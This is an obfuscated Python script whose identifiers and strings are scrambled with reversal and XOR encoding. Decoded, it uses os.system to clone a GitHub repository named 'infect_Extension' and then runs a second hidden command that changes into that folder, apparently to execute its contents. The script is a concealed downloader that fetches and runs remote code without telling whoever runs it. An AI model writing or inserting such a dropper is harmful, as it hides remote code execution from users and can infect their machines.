l1llO1OO0l0l0O00011l0 = (lambda l1O001lO1101OO00010Ol,
    O10lOOO01l00l00l110O0: l1O001lO1101OO00010Ol ^ O10lOOO01l00l00l110O0)
O110l11O1010ll11ll0ll = (lambda O10OOl1l1OO100ll0O000,
    l1l01O10O000000Ol01Ol: O10OOl1l1OO100ll0O000 + l1l01O10O000000Ol01Ol)
lOOOlll011O1l01011lO0 = __import__('er'[::-1], globals(), locals(), [], 0)
O11llOlOOlO0llO0O111O = __import__('o' + 's', globals(), locals(), [], 0)
getattr(O11llOlOOlO0llO0O111O, 'metsys'[::-1])(
    'hT/moc.buhtig//:sptth enolc tig'[::-1] + ''.join(chr(
    l00O1O1lO1lll01l0100l ^ l0001Ol1010O1O01lOl1O) for 
    l0001Ol1010O1O01lOl1O, l00O1O1lO1lll01l0100l in zip(
    b'\xb9N\x06\xe8^\xbb\x1e\x0e\xc2\x0f\xef\xb1\xa0\x9cV\xaf/\xf4\x06Y\x03\x91\xee\x1f\xef\xd0L\xd6\x0e\xd9\xdc\xc5'
    ,
    b'\xdccK\x89:\xd6\x7f`\xef]\x8a\xd3\xcf\xee8\x80F\x9a`<`\xe5\xb1Z\x97\xa4)\xb8}\xb0\xb3\xab'
    )))
getattr(O11llOlOOlO0llO0O111O, ''.join(chr(OO11l011O10O111l1l1l0 ^
    O1OOlO1010Ol001lO11OO) for O1OOlO1010Ol001lO11OO, OO11l011O10O111l1l1l0 in
    zip(b'L?c\x98%\x12', b'?F\x10\xec@\x7f')))(''.join(filter(lambda
    Ol0lO110O1l01llOO1O01: ord(Ol0lO110O1l01llOO1O01) % 6 != 0,
    'B0\x00r$$$6*6Tl\x06\x0c6')).join(chr(llOOO1Ol1O11101O00lOl ^
    ll101O1l0l00lllO01O01) for ll101O1l0l00lllO01O01, llOOO1Ol1O11101O00lOl in
    zip(
    b'+\xcf\x1d[2p\xb1\xea;\x07\x0b\x92\\Z\xb8\xaf\xc4c\xe5\xbd\xe6\x8cC\xe7\xf2\x1eEy+\xdb\x03\xc4\xdc(\x17"y\xf0'
    ,
    b'H\xab=2\\\x16\xd4\x89OXN\xea(?\xd6\xdc\xad\x0c\x8b\x9d\xc0\xaac\x97\x8bj-\x16E\xfbp\xa1\xa8]g\x0c\x01\x9f'
    )))
